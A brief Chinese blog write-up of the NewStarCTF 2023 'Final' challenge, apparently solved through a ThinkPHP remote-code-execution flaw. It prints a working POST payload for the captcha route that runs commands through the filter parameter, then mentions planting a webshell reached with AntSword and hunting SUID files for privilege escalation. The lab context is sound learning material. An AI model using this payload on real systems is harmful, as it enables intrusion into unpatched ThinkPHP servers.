每周一练--[NewStarCTF 2023 公开赛道]Final

很明显又是ThinkPHP的漏洞,上周还做过类似的。

先看看是哪一个版本的。

得到版号后,去找找payload。

(post)public/index.php?s=captcha

(data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

这其中filter[]=接要执行的命令,server[REQUEST_METHOD]=这个后面接命令的参数。(我试了一下,似乎是数字就行)

因为禁用了system,所以我们改用echo。

如图,成功用蚁剑连接上。

发现我们权限不够咧。先找有suid权限的文件,然后不知道怎么的,没有回显。我还以为是弄错什么了。急忙看看大佬写的,原来是环境问题。接着把flag复制出来,再读取就拿到flag了。

相关推荐
Chengbei1110 分钟前
Fortify_SCA_26.1版下载(OpenText SAST(Fortify SCA)26.1 windows/Linux/Mac)全版本下载
运维·安全·web安全·macos·网络安全·系统安全·代码审计
亚空间仓鼠25 分钟前
Ansible之Playbook(六):实例部署实战
linux·网络·ansible
雨墨✘29 分钟前
SAP硬件选择详解:服务器、存储与网络的全面解析
运维·服务器·网络
Oll Correct36 分钟前
实验十八:验证路由信息协议RIPv1
网络·笔记
不会写DN1 小时前
为什么TCP是三次握手?
服务器·网络·网络协议·tcp/ip
2501_913061341 小时前
网络编程——了解客户端与服务器端之间的交互(1)
java·网络
M158227690551 小时前
三格电子 EtherNet/IP 协议网关产品介绍
网络·网络协议·tcp/ip
刘~浪地球1 小时前
网络性能调优实践
网络
爱学习的小囧1 小时前
ESXi CPU 使用率高怎么排查?esxtop 一键定位占用高的虚拟机与进程
java·linux·运维·服务器·网络·虚拟化
复园电子1 小时前
电子签章系统选型方法论:SaaS、私有部署、API接口版怎么选
服务器·网络·lims系统